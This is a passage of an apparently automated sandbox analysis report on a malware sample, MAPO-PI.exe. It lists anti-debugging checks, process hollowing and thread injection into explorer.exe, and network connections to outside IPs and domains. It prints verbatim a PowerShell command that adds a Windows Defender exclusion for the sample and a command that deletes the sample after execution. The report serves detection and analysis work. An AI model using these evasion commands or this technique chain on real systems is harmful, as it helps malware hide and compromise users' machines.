          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h]3_2_0189DB40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h]3_2_01968B58
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h]3_2_0189F358
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h]3_2_0189DB60
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]3_2_018C3B7A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]3_2_018C3B7A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]3_2_018CD294
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]3_2_018CD294
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]3_2_018AAAB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]3_2_018AAAB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h]3_2_018CFAB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h]3_2_018C2ACB
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h]3_2_018C2AE4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h]3_2_018A8A0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h]3_2_018B3A1C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]3_2_0189AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]3_2_0189AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]3_2_018D4A2C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]3_2_018D4A2C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h]3_2_0195EA55
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01924257 mov eax, dword ptr fs:[00000030h]3_2_01924257
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]3_2_0194B260
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]3_2_0194B260
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h]3_2_01968A62
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D927A mov eax, dword ptr fs:[00000030h]3_2_018D927A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]3_2_018CFD9B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]3_2_018CFD9B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h]3_2_018C35A1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]3_2_018C1DB5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]3_2_018C1DB5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]3_2_018C1DB5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]3_2_019605AC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]3_2_019605AC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h]3_2_01948DF1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]3_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]3_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h]3_2_01968D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h]3_2_0191A537
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h]3_2_0195E539
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]3_2_018C4D3B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]3_2_018C4D3B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]3_2_018C4D3B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h]3_2_0189AD30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h]3_2_018D3D43
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913540 mov eax, dword ptr fs:[00000030h]3_2_01913540
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h]3_2_01943D40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h]3_2_018B7D50
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]3_2_018BC577
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]3_2_018BC577
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A849B mov eax, dword ptr fs:[00000030h]3_2_018A849B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h]3_2_01968CD6
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]3_2_01916CF0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]3_2_01916CF0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]3_2_01916CF0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019514FB mov eax, dword ptr fs:[00000030h]3_2_019514FB
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]3_2_0196740D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]3_2_0196740D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]3_2_0196740D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h]3_2_018CBC2C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]3_2_0192C450
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]3_2_0192C450
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h]3_2_018CA44B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B746D mov eax, dword ptr fs:[00000030h]3_2_018B746D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0040ACC0 LdrLoadDll
          Source: C:\Users\user\Desktop\MAPO-PI.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 159.65.10.143 80
          Source: C:\Windows\explorer.exe Domain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exe Domain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exe Domain query: www.diofis.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 109.232.217.55 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 8B0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3472
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.240240784.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Users\user\Desktop\MAPO-PI.exe VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
